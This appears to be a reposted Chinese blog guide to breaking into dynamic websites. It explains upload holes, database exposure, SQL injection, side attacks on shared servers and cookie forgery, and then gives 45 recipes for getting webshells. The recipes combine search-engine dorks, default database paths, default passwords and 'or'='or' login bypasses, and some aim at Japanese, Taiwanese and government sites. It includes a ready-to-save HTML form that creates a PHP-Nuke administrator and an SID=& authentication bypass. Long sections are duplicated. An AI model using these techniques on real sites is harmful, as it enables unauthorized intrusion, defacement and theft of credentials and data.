一***.
***的方法有很多.上傳.注入(DB.SA).旁注.暴库.COOKIE诈骗..等.後台or=or.動網.動易.等BGU
能過這些方法都能拿到很多WEBSELL.
要***.先得了解BUG形成的原理.時間有限.網上找了幾篇
【导读】什么样的站点可以***?必须是动态的网站,比如asp、php、jsp 这种形式的站点,***方式: 1、上传漏洞;2、暴库;3、注入;4、旁注;5、COOKIE诈骗。
首先介绍下什么样的站点可以***:必须是动态的网站,比如asp、php、jsp 这种形式的站点。后缀为.htm的站点劝大家还是不要***了吧(***几率几乎为0)。
***介绍: 1、上传漏洞;2、暴库;3、注入;4、旁注;5、
。
1、上传漏洞
这个漏洞在DVBBS6.0时代被***们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHELL,危害等级超级高,现在的***中上传漏洞也是常见的漏洞。
怎样利用:在网站的地址栏中网址后加上/upfile.asp如果显示“上传格式不正确[重新上传]”这样的字样就是有上传漏洞了,找个可以上传的工具直接可以得到WEBSHELL。
工具介绍:上传工具,老兵的上传工具、DOMAIN3.5,这两个软件都可以达到上传的目的,用NC也可以提交。
WEBSHELL是什么:WEBSHELL在上节课简单的介绍了下,许多人都不理解,这里就详细讲下,其实WEBSHELL并不什么深奥的东西,是个WEB的权限,可以管理WEB,修改主页内容等权限,但是并没有什么特别高的权限,(这个看管理员的设置了)一般修改别人主页大多都需要这个权限,接触过WEB***的朋友可能知道(比如老兵的站长助手就是WEB***,海阳2006也是WEB***)。我们上传漏洞最终传的就是这个东西,有时碰到权限设置不好的服务器可以通过WEBSHELL得到最高权限。
2、暴库
这个漏洞现在很少见了,但是还有许多站点有这个漏洞可以利用,暴库就是提交字符得到数据库文件,得到了数据库文件我们就直接有了站点的前台或者后台的权限了。
暴库方法:比如一个站的地址为 [url]http://www.xxx.com/dispbbs.asp[/url] boardID=7&ID=161,我门就可以把com/dispbbs中间的/换成%5c,如果有漏洞直接得到数据库的绝对路径,用寻雷什么的下载下来就可以了。还有种方法就是利用默认的数据库路径 [url]http://www.xxx.com/[/url]后面加上conn.asp。如果没有修改默认的数据库路径也可以得到数据库的路径(注意:这里的/也要换成%5c)。
为什么换成%5c:因为在ASCII码里/等于%5c,有时碰到数据库名字为/#abc.mdb的为什么下不了 这里需要把#号换成%23就可以下载了,为什么我暴出的数据库文件是以。ASP结尾的 我该怎么办 这里可以在下载时把.ASP换成.MDB 这样就可以下载了如果还下载不了可能作了防下载。
3、注入漏洞
这个漏洞是现在应用最广泛,杀伤力也很大的漏洞,可以说微软的官方网站也存在着注入漏洞。注入漏洞是因为字符过滤不严禁所造成的,可以得到管理员的帐号密码等相关资料。
怎样利用:我先介绍下怎样找漏洞比如这个网址 [url]http://www.xxx.com/dispbbs.asp[/url] boardID=7&ID=161 后面是以ID=数字形式结尾的站我们可以手动在后面加上个 and 1=1 看看 如果显示正常页面 再加上个and 1=2 来看看 如果返回正常页面说明没有漏洞 如果返回错误页面说明存在注入漏洞。如果加and 1=1 返回错误页面说明也没有漏洞,知道了站点有没有漏洞我门就可以利用了 可以手工来猜解也可以用工具现在工具比较多(NBSI、NDSI、啊D、DOMAIN等),都可以用来猜解帐号密码,因为是菜鸟接触,我还是建议大家用工具,手工比较烦琐。
4、旁注
我们***某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来***我们要***的站点。打个形象的比喻,比如你和我一个楼,我家很安全,而你家呢,却漏洞百出,现在有个贼想***我家,他对我家做了监视(也就是扫描),发现没有什么可以利用的东西,那么这个贼发现你家和我家一个楼,你家很容易就进去了,他可以先进入你家,然后通过你家得到整个楼的钥匙(系统权限),这样就自然得到我的钥匙了,就可以进入我的家(网站)。
工具介绍:还是名小子的DOMIAN3.5不错的东西,可以检测注入,可以旁注,还可以上传!
5、COOKIE诈骗
许多人不知道什么是COOKIE,COOKIE是你上网时由网站所为你发送的值记录了你的一些资料,比如IP,姓名什么的。
怎样诈骗呢?如果我们现在已经知道了XX站管理员的站号和MD5密码了,但是破解不出来密码(MD5是加密后的一个16位的密码)。我们就可以用COOKIE诈骗来实现,把自己的ID修改成管理员的,MD5密码也修改成他的,有工具可以修改COOKIE 这样就答到了COOKIE诈骗的目的,系统以为你就是管理员了。
今天的介绍就到这里了,比较基础,都是概念性的东西,所有的都是我的个人理解,如有不正确的地方希望大家指出(个人认为就是,为什么换成%5c,这里有点问题)。
45种可以拿到Webshell的方法
到GoogLe,搜索一些关键字,edit.asp 韩国肉鸡为多,多数为MSSQL数据库!
2,
到Google ,site:cq.cn inurl:asp
3,
利用挖掘鸡和一个ASP***.
文件名是login.asp
路径组是/manage/
关键词是went.asp
用'or'='or'来登陆
4,
关键字:Co Net MIB Ver 1.0网站后台管理系统
帐号密码为 'or'='or'
5.
动感购物系统
inurl:help.asp登陆,如未注册成为会员!
upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞
6。
默认数据库地址blogdata/acblog.asa
关键字:acblog
7.
百度 /htdocs
注册里可以直接上传asa文件!
8.
/Database/#newasp.mdb
关键词:NewAsp SiteManageSystem Version
9.
用挖掘机
关键字:Powered by WEBBOY
页面:/upfile.asp
10.
baidu中搜索关键字Ver5.0 Build 0519
(存在上传漏洞)
11.
Upfile_Article.asp bbs/upfile.asp
输入关键字:powered by mypower ,
12.
inurl:winntsystem32inetsrv 在google里面输入这个就可以找到很多网站
13.
现在GOOGLE搜索关键字 intitle:网站小助手 inurl:asp
14.
键字: 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买 站内流言 友情连接 本站论坛
挖掘鸡的关键字 添 setup.asp
15.
VBulletin论坛的数据库
默认数据库地址!
/includes/functions.php
工具:
1.网站猎手 下载地址:百度 Google!
2.Google
关键字:
Powered by: vBulletin Version 3.0.1
Powered by: vBulletin Version 3.0.2
Powered by: vBulletin Version 3.0.3
其中一个就可以了
16.
1.打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cart
open source。 这是一个商场系统。
2.网站的最底部分,有个 Comersus Open Technologies LC。打开看下~~comersus系统~
猜到,comersus.mdb. 是数据库名
数据库都是放在database/ 后的,
所以database/comersus.mdb
comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。
那样把前一个''store/''除去,再加上database/comersus.mdb 试试
17.
无忧传奇官方站点程序。
1、后台管理地址:http://您的域名/msmiradmin/
2、默认后台管理帐号:msmir
3、默认后台管理密码:msmirmsmir
数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb
数据库连接文件为 ***********/Conn.asp
18.
百度里输入/skins/default/
19.
利用挖掘机
关键机:power by Discuz
路径:/wish.php
配合:
Discuz!论坛 wish.php远程包含漏洞 工具使用
20.
上传漏洞.
工具 : Domain3.5
网站猎手 1.5版
关键字powered by mypower
检测的页面或文件插入upfile_photo.asp
21.
新云漏洞
这个漏洞ACCESS和SQL版通吃。
Google搜索关键字 "关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登录"
把flash/downfile.asp url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp
以源码,软件等下载站居多。
大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了
database%23newasp.mdb
如:#xzws.mdb 改成%23xzws.mdb
22.
通吃所有商城+动力上传系统
使用工具:挖掘鸡 v1.1 明小子
商城***:
关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成
漏洞页面:upload.asp
upfile_flash.asp
动力***:
关键字:powered by mypower
漏洞页面:upfile_photo.asp
Upfile_Soft.asp
upfile_adpic.asp
upfile_softpic.asp
23.
注射漏洞
百度搜索:oioj's blog
24
动易
列目录
admin_articlerecyclebin.asp
inurl:admin_articlerecyclebin.asp
25.
工具:网站猎手
关键词:inurl:Went.asp
后缀:manage/login.asp
口令:'or'='or'
26.
***魔兽私服
需要的工具:ASP***一只。
Domain3.5明小子
关键字:All Right Reserved Design:游戏联盟
后台地址:admin/login.asp
数据库的地址:chngame/#chngame.mdb
27.
漏洞是利用管理员iis设置的失误
用baidu 关键字就是比较罕见的脚本名
动网: ReloadForumCache.asp
Leadbbs: makealltopanc.asp
BBSXP: admin_fso.asp
动易: admin_articlerecyclebin.asp
28.
国外站的爆库漏洞
关键字:sad Raven's Guestbook
密码地址:/passwd.dat
后台地址:/admin.php
29.
Discuz 4.1.0跨站漏洞
利用工具:1,WAP浏览器
2,WAP编码转换器
关键字:"intext:Discuz! 4.1.0"
30.
关键字:尚奈克斯
后台路径/system/manage.asp
直接传ASP***
31.
工具
1:网站猎手
2:大马一个
关键字:切勿关闭Cookies功能,否则您将不能登录
插入diy.asp
32.
关键字:Team5 Studio All rights reserved
默认数据库:data/team.mdb
33.
工具: 挖掘机 辅臣数据库读取器
关键字: 企业简介 产品展示 产品列表
后缀添加: /database/myszw.mdb
后台地址: admin/Login.asp
34.
关键子 XXX inurl:Nclass.asp
在"系统设置"里写个***。
会被保存到 在 config.asp内。
35.
不进后台照样拿动网WEBSHELL
data.asp action=BackupData 动网数据库备份默认路径
36.
工具:网站猎手 WebShell
关键字:inurl:Went.asp
后缀:manage/login.asp
弱口令:'or'='or'
37.
关键字:Powered by:QCDN_NEWS
随便扫遍文章加一个' ,来试探注入点
后台地址:admin_index.asp
38.
***雷池新闻发布系统
关键字:leichinews
去掉leichinews后面的.
打上:admin/uploadPic.asp actionType=mod&picName=xuanran.asp
再上传马.....
进访问uppic anran.asp 登陆马.
39.
关键字:Power System Of Article Management Ver 3.0 Build 20030628
默认数据库:databaseyiuwekdsodksldfslwifds.mdb
后台地址:自己扫描!
40.
一、通过GOOGLE搜索找大量注入点
关键字:asp id=1 gov.jp/ asp id=
页数:100
语言:想***哪个国家就填什么语言吧
41.
关键字:Powered by:94KKBBS 2005
利用密码找回功能 找回admin
提问:ddddd 回答:ddddd
42.
关键字:inurl:Went.asp
后台为manage/login.asp
后台密码: 'or'=' 或者 'or''=''or' 登录 进入
默认数据库地址:Database/DataShop.mdb
43.
关键字:****** inurl:readnews.asp
把最后一个/改成%5c ,直接暴库,看密码,进后台
随便添加个新闻 在标题输入我们的一句话***
44.
工具:一句话***
BBsXp 5.0 sp1 管理员猜解器
关键词:powered by bbsxp5.00
进后台,备份一句话马!
45.
关键字:程序核心:BJXSHOP网上开店专家
后台:/admin
***的方法有很多.上傳.注入(DB.SA).旁注.暴库.COOKIE诈骗..等.後台or=or.動網.動易.等BGU
能過這些方法都能拿到很多WEBSELL.
要***.先得了解BUG形成的原理.時間有限.網上找了幾篇
【导读】什么样的站点可以***?必须是动态的网站,比如asp、php、jsp 这种形式的站点,***方式: 1、上传漏洞;2、暴库;3、注入;4、旁注;5、COOKIE诈骗。
首先介绍下什么样的站点可以***:必须是动态的网站,比如asp、php、jsp 这种形式的站点。后缀为.htm的站点劝大家还是不要***了吧(***几率几乎为0)。
***介绍: 1、上传漏洞;2、暴库;3、注入;4、旁注;5、
。
1、上传漏洞
这个漏洞在DVBBS6.0时代被***们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHELL,危害等级超级高,现在的***中上传漏洞也是常见的漏洞。
怎样利用:在网站的地址栏中网址后加上/upfile.asp如果显示“上传格式不正确[重新上传]”这样的字样就是有上传漏洞了,找个可以上传的工具直接可以得到WEBSHELL。
工具介绍:上传工具,老兵的上传工具、DOMAIN3.5,这两个软件都可以达到上传的目的,用NC也可以提交。
WEBSHELL是什么:WEBSHELL在上节课简单的介绍了下,许多人都不理解,这里就详细讲下,其实WEBSHELL并不什么深奥的东西,是个WEB的权限,可以管理WEB,修改主页内容等权限,但是并没有什么特别高的权限,(这个看管理员的设置了)一般修改别人主页大多都需要这个权限,接触过WEB***的朋友可能知道(比如老兵的站长助手就是WEB***,海阳2006也是WEB***)。我们上传漏洞最终传的就是这个东西,有时碰到权限设置不好的服务器可以通过WEBSHELL得到最高权限。
2、暴库
这个漏洞现在很少见了,但是还有许多站点有这个漏洞可以利用,暴库就是提交字符得到数据库文件,得到了数据库文件我们就直接有了站点的前台或者后台的权限了。
暴库方法:比如一个站的地址为 [url]http://www.xxx.com/dispbbs.asp[/url] boardID=7&ID=161,我门就可以把com/dispbbs中间的/换成%5c,如果有漏洞直接得到数据库的绝对路径,用寻雷什么的下载下来就可以了。还有种方法就是利用默认的数据库路径 [url]http://www.xxx.com/[/url]后面加上conn.asp。如果没有修改默认的数据库路径也可以得到数据库的路径(注意:这里的/也要换成%5c)。
为什么换成%5c:因为在ASCII码里/等于%5c,有时碰到数据库名字为/#abc.mdb的为什么下不了 这里需要把#号换成%23就可以下载了,为什么我暴出的数据库文件是以。ASP结尾的 我该怎么办 这里可以在下载时把.ASP换成.MDB 这样就可以下载了如果还下载不了可能作了防下载。
3、注入漏洞
这个漏洞是现在应用最广泛,杀伤力也很大的漏洞,可以说微软的官方网站也存在着注入漏洞。注入漏洞是因为字符过滤不严禁所造成的,可以得到管理员的帐号密码等相关资料。
怎样利用:我先介绍下怎样找漏洞比如这个网址 [url]http://www.xxx.com/dispbbs.asp[/url] boardID=7&ID=161 后面是以ID=数字形式结尾的站我们可以手动在后面加上个 and 1=1 看看 如果显示正常页面 再加上个and 1=2 来看看 如果返回正常页面说明没有漏洞 如果返回错误页面说明存在注入漏洞。如果加and 1=1 返回错误页面说明也没有漏洞,知道了站点有没有漏洞我门就可以利用了 可以手工来猜解也可以用工具现在工具比较多(NBSI、NDSI、啊D、DOMAIN等),都可以用来猜解帐号密码,因为是菜鸟接触,我还是建议大家用工具,手工比较烦琐。
4、旁注
我们***某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来***我们要***的站点。打个形象的比喻,比如你和我一个楼,我家很安全,而你家呢,却漏洞百出,现在有个贼想***我家,他对我家做了监视(也就是扫描),发现没有什么可以利用的东西,那么这个贼发现你家和我家一个楼,你家很容易就进去了,他可以先进入你家,然后通过你家得到整个楼的钥匙(系统权限),这样就自然得到我的钥匙了,就可以进入我的家(网站)。
工具介绍:还是名小子的DOMIAN3.5不错的东西,可以检测注入,可以旁注,还可以上传!
5、COOKIE诈骗
许多人不知道什么是COOKIE,COOKIE是你上网时由网站所为你发送的值记录了你的一些资料,比如IP,姓名什么的。
怎样诈骗呢?如果我们现在已经知道了XX站管理员的站号和MD5密码了,但是破解不出来密码(MD5是加密后的一个16位的密码)。我们就可以用COOKIE诈骗来实现,把自己的ID修改成管理员的,MD5密码也修改成他的,有工具可以修改COOKIE 这样就答到了COOKIE诈骗的目的,系统以为你就是管理员了。
今天的介绍就到这里了,比较基础,都是概念性的东西,所有的都是我的个人理解,如有不正确的地方希望大家指出(个人认为就是,为什么换成%5c,这里有点问题)。
45种可以拿到Webshell的方法
到GoogLe,搜索一些关键字,edit.asp 韩国肉鸡为多,多数为MSSQL数据库!
2,
到Google ,site:cq.cn inurl:asp
3,
利用挖掘鸡和一个ASP***.
文件名是login.asp
路径组是/manage/
关键词是went.asp
用'or'='or'来登陆
4,
关键字:Co Net MIB Ver 1.0网站后台管理系统
帐号密码为 'or'='or'
5.
动感购物系统
inurl:help.asp登陆,如未注册成为会员!
upLoad_bm1.asp和upLoad_c1.asp这两个随便选个,一般管理员都忽视了这2漏洞
6。
默认数据库地址blogdata/acblog.asa
关键字:acblog
7.
百度 /htdocs
注册里可以直接上传asa文件!
8.
/Database/#newasp.mdb
关键词:NewAsp SiteManageSystem Version
9.
用挖掘机
关键字:Powered by WEBBOY
页面:/upfile.asp
10.
baidu中搜索关键字Ver5.0 Build 0519
(存在上传漏洞)
11.
Upfile_Article.asp bbs/upfile.asp
输入关键字:powered by mypower ,
12.
inurl:winntsystem32inetsrv 在google里面输入这个就可以找到很多网站
13.
现在GOOGLE搜索关键字 intitle:网站小助手 inurl:asp
14.
键字: 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买 站内流言 友情连接 本站论坛
挖掘鸡的关键字 添 setup.asp
15.
VBulletin论坛的数据库
默认数据库地址!
/includes/functions.php
工具:
1.网站猎手 下载地址:百度 Google!
2.Google
关键字:
Powered by: vBulletin Version 3.0.1
Powered by: vBulletin Version 3.0.2
Powered by: vBulletin Version 3.0.3
其中一个就可以了
16.
1.打开百度或GOOGLE搜索,输入powered by comersus ASP shopping cart
open source。 这是一个商场系统。
2.网站的最底部分,有个 Comersus Open Technologies LC。打开看下~~comersus系统~
猜到,comersus.mdb. 是数据库名
数据库都是放在database/ 后的,
所以database/comersus.mdb
comersus_listCategoriesTree.asp换成database/comersus.mdb,不能下载。
那样把前一个''store/''除去,再加上database/comersus.mdb 试试
17.
无忧传奇官方站点程序。
1、后台管理地址:http://您的域名/msmiradmin/
2、默认后台管理帐号:msmir
3、默认后台管理密码:msmirmsmir
数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb
数据库连接文件为 ***********/Conn.asp
18.
百度里输入/skins/default/
19.
利用挖掘机
关键机:power by Discuz
路径:/wish.php
配合:
Discuz!论坛 wish.php远程包含漏洞 工具使用
20.
上传漏洞.
工具 : Domain3.5
网站猎手 1.5版
关键字powered by mypower
检测的页面或文件插入upfile_photo.asp
21.
新云漏洞
这个漏洞ACCESS和SQL版通吃。
Google搜索关键字 "关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登录"
把flash/downfile.asp url=uploadfile/../../conn.asp提交到网站根目录。就可以下载conn.asp
以源码,软件等下载站居多。
大家时常碰到数据库如果前面或者中间+了# 可以用%23替换就可以下载了
database%23newasp.mdb
如:#xzws.mdb 改成%23xzws.mdb
22.
通吃所有商城+动力上传系统
使用工具:挖掘鸡 v1.1 明小子
商城***:
关键字:选购->加入购物车->去收银台->确认收货人信息->选付款方式->选配送方式->在线支付或下单后汇款->汇款确认->发货->完成
漏洞页面:upload.asp
upfile_flash.asp
动力***:
关键字:powered by mypower
漏洞页面:upfile_photo.asp
Upfile_Soft.asp
upfile_adpic.asp
upfile_softpic.asp
23.
注射漏洞
百度搜索:oioj's blog
24
动易
列目录
admin_articlerecyclebin.asp
inurl:admin_articlerecyclebin.asp
25.
工具:网站猎手
关键词:inurl:Went.asp
后缀:manage/login.asp
口令:'or'='or'
26.
***魔兽私服
需要的工具:ASP***一只。
Domain3.5明小子
关键字:All Right Reserved Design:游戏联盟
后台地址:admin/login.asp
数据库的地址:chngame/#chngame.mdb
27.
漏洞是利用管理员iis设置的失误
用baidu 关键字就是比较罕见的脚本名
动网: ReloadForumCache.asp
Leadbbs: makealltopanc.asp
BBSXP: admin_fso.asp
动易: admin_articlerecyclebin.asp
28.
国外站的爆库漏洞
关键字:sad Raven's Guestbook
密码地址:/passwd.dat
后台地址:/admin.php
29.
Discuz 4.1.0跨站漏洞
利用工具:1,WAP浏览器
2,WAP编码转换器
关键字:"intext:Discuz! 4.1.0"
30.
关键字:尚奈克斯
后台路径/system/manage.asp
直接传ASP***
31.
工具
1:网站猎手
2:大马一个
关键字:切勿关闭Cookies功能,否则您将不能登录
插入diy.asp
32.
关键字:Team5 Studio All rights reserved
默认数据库:data/team.mdb
33.
工具: 挖掘机 辅臣数据库读取器
关键字: 企业简介 产品展示 产品列表
后缀添加: /database/myszw.mdb
后台地址: admin/Login.asp
34.
关键子 XXX inurl:Nclass.asp
在"系统设置"里写个***。
会被保存到 在 config.asp内。
35.
不进后台照样拿动网WEBSHELL
data.asp action=BackupData 动网数据库备份默认路径
36.
工具:网站猎手 WebShell
关键字:inurl:Went.asp
后缀:manage/login.asp
弱口令:'or'='or'
37.
关键字:Powered by:QCDN_NEWS
随便扫遍文章加一个' ,来试探注入点
后台地址:admin_index.asp
38.
***雷池新闻发布系统
关键字:leichinews
去掉leichinews后面的.
打上:admin/uploadPic.asp actionType=mod&picName=xuanran.asp
再上传马.....
进访问uppic anran.asp 登陆马.
39.
关键字:Power System Of Article Management Ver 3.0 Build 20030628
默认数据库:databaseyiuwekdsodksldfslwifds.mdb
后台地址:自己扫描!
40.
一、通过GOOGLE搜索找大量注入点
关键字:asp id=1 gov.jp/ asp id=
页数:100
语言:想***哪个国家就填什么语言吧
41.
关键字:Powered by:94KKBBS 2005
利用密码找回功能 找回admin
提问:ddddd 回答:ddddd
42.
关键字:inurl:Went.asp
后台为manage/login.asp
后台密码: 'or'=' 或者 'or''=''or' 登录 进入
默认数据库地址:Database/DataShop.mdb
43.
关键字:****** inurl:readnews.asp
把最后一个/改成%5c ,直接暴库,看密码,进后台
随便添加个新闻 在标题输入我们的一句话***
44.
工具:一句话***
BBsXp 5.0 sp1 管理员猜解器
关键词:powered by bbsxp5.00
进后台,备份一句话马!
45.
关键字:程序核心:BJXSHOP网上开店专家
后台:/admin
***關鍵字:
说明:这是本人通过看教程看资料收集到的***网站的关键词!!!给大家分享一下!!
找到这些真不容易,一边看教程一边暂停下来抄下关键词,现在许多人的教程都没有给
出关键词只有自己去找才可以找到!!! 我收集的也不全面,希望大家把我没有的关键词
发到这里来,我再统一整理,这样就可以通过大家的一份力,找到大量的关键词了,以后想
***时就方便多了!!!
说明:这是本人通过看教程看资料收集到的***网站的关键词!!!给大家分享一下!!
找到这些真不容易,一边看教程一边暂停下来抄下关键词,现在许多人的教程都没有给
出关键词只有自己去找才可以找到!!! 我收集的也不全面,希望大家把我没有的关键词
发到这里来,我再统一整理,这样就可以通过大家的一份力,找到大量的关键词了,以后想
***时就方便多了!!!
1.数据库的默认地址:bbs/data/dvbbs.mdb 或 bbs/data/dvbbs7.mdb ------bbs
默认密码漏洞: admin admin888
2.你要的网页的名称 inurl:asp ---------找ASP的网站
3.关键字owered By WEBBOY 后缀名: /upfile.asp ------------找上传网站漏洞
4.先打开“百度” [url]http://www.baidu.com[/url] ------找网站后台
在搜索栏里面填入:网站后台管理系统 系统管理 企业信息 产品管理 会员管理
新闻管理 留言管理
然后点“搜索”
5.先去 [url]www.google.com[/url]
去搜索"p_w_picpaths/admin"
网站FTP上的文件,
找台湾的站".tw/p_w_picpaths/admin"
台湾的..我们要***的话,找它的数据库
如果想找文件的话就找地址...
6.黑日本网站关键字:
Copyright by All Rights Reserved "PHP Nuke" site:.jp 去网上去索吧!!!
成为管理员网页代码:
<body bgcolor="#000000">
<form name="mantra" mathod="POST" action=" [url]http://www[/url].网址/phpnuke/admin.php">
<p align="center"><b><font color="#FFFF00">USERNAME:
<input type="text" name="add_aid" size="20" value="Air_hacker">
NOME:<input type="text" name="add_name" size="20" value="12345">
PASSWORD: <input type="text" name="add pwd" size="20" value="12345">
E_mail:
<input type="text" name="add_email" size="20" value=" [email]admin@admin.com[/email]">
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<input type="hidden" name="add_radminsuper" value="1">
<input type="hidden" name="op" value="AddAuthor"></font></b></p>
<p align="center"><b><font color="#FFFF00">
<input type="submit" name="submit" value="Create Admin" style="font-family:
Comic Sans Ms; color=#FFFF00; font-weigh:bold; background-color:#000000">
</font></b>
</p>
</form>
<p align="center"><b><font size="5" color="#FFFFFF"> </font>
<font size ="5" color="#008000">msyvh</font></b></p>
<p align="center"><b><font size="4" color="#FFF000">My</font><font size="4"
color="#008000">blog: </font>
<font size="4" color="#ECE9D8">&</font>
<font size="4" color="#C0C0C0">noway</font></font></font></b></p>
<p align="center"><b><font size="5" color="#FFFFFF">
<font size="4" color="#C0C0C0">QQ:87761354</font>
<font size="4" color="#C0C0C0">QQ学习群:22489933</font>
<font size="4" color="#C0C0C0">"自由&天空"</font></b></p>
说明:将这代码保存为.html网页格式就可以了,这是成为后台管理员的代码!这代码是
我从视频教程里通过暂停,一个一个的抄出来的啊!你们可不要浪费我的心血啊!!
7.找数据库的关键字: conn.inc ; dvbbs5.mdb ; news.mdb ; article.mdb
admin_data.mdb ; user.mdb ; admin.mdb
8.QQ代理公布器 2005 -----QQProxy 代理器这个代理器可以知代理速度!
9.关于KevinDL Ver 1.00 ------------PHP漏洞
[PHP+SQL]这个PHP程序漏洞利用
目标:[url]http://www.XXX.com[/url]
找到后台登录界面:[url]http://www.XXX.com/admin.php[/url] 要密码!!!
绕过方法:在登录验证后面加上: SID=&
如:[url]http://www.XXX.com/admin.php[/url] SID=&
默认密码漏洞: admin admin888
2.你要的网页的名称 inurl:asp ---------找ASP的网站
3.关键字owered By WEBBOY 后缀名: /upfile.asp ------------找上传网站漏洞
4.先打开“百度” [url]http://www.baidu.com[/url] ------找网站后台
在搜索栏里面填入:网站后台管理系统 系统管理 企业信息 产品管理 会员管理
新闻管理 留言管理
然后点“搜索”
5.先去 [url]www.google.com[/url]
去搜索"p_w_picpaths/admin"
网站FTP上的文件,
找台湾的站".tw/p_w_picpaths/admin"
台湾的..我们要***的话,找它的数据库
如果想找文件的话就找地址...
6.黑日本网站关键字:
Copyright by All Rights Reserved "PHP Nuke" site:.jp 去网上去索吧!!!
成为管理员网页代码:
<body bgcolor="#000000">
<form name="mantra" mathod="POST" action=" [url]http://www[/url].网址/phpnuke/admin.php">
<p align="center"><b><font color="#FFFF00">USERNAME:
<input type="text" name="add_aid" size="20" value="Air_hacker">
NOME:<input type="text" name="add_name" size="20" value="12345">
PASSWORD: <input type="text" name="add pwd" size="20" value="12345">
E_mail:
<input type="text" name="add_email" size="20" value=" [email]admin@admin.com[/email]">
<input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
<input type="hidden" name="add_radminsuper" value="1">
<input type="hidden" name="op" value="AddAuthor"></font></b></p>
<p align="center"><b><font color="#FFFF00">
<input type="submit" name="submit" value="Create Admin" style="font-family:
Comic Sans Ms; color=#FFFF00; font-weigh:bold; background-color:#000000">
</font></b>
</p>
</form>
<p align="center"><b><font size="5" color="#FFFFFF"> </font>
<font size ="5" color="#008000">msyvh</font></b></p>
<p align="center"><b><font size="4" color="#FFF000">My</font><font size="4"
color="#008000">blog: </font>
<font size="4" color="#ECE9D8">&</font>
<font size="4" color="#C0C0C0">noway</font></font></font></b></p>
<p align="center"><b><font size="5" color="#FFFFFF">
<font size="4" color="#C0C0C0">QQ:87761354</font>
<font size="4" color="#C0C0C0">QQ学习群:22489933</font>
<font size="4" color="#C0C0C0">"自由&天空"</font></b></p>
说明:将这代码保存为.html网页格式就可以了,这是成为后台管理员的代码!这代码是
我从视频教程里通过暂停,一个一个的抄出来的啊!你们可不要浪费我的心血啊!!
7.找数据库的关键字: conn.inc ; dvbbs5.mdb ; news.mdb ; article.mdb
admin_data.mdb ; user.mdb ; admin.mdb
8.QQ代理公布器 2005 -----QQProxy 代理器这个代理器可以知代理速度!
9.关于KevinDL Ver 1.00 ------------PHP漏洞
[PHP+SQL]这个PHP程序漏洞利用
目标:[url]http://www.XXX.com[/url]
找到后台登录界面:[url]http://www.XXX.com/admin.php[/url] 要密码!!!
绕过方法:在登录验证后面加上: SID=&
如:[url]http://www.XXX.com/admin.php[/url] SID=&
转载于:https://blog.51cto.com/sysmw/113538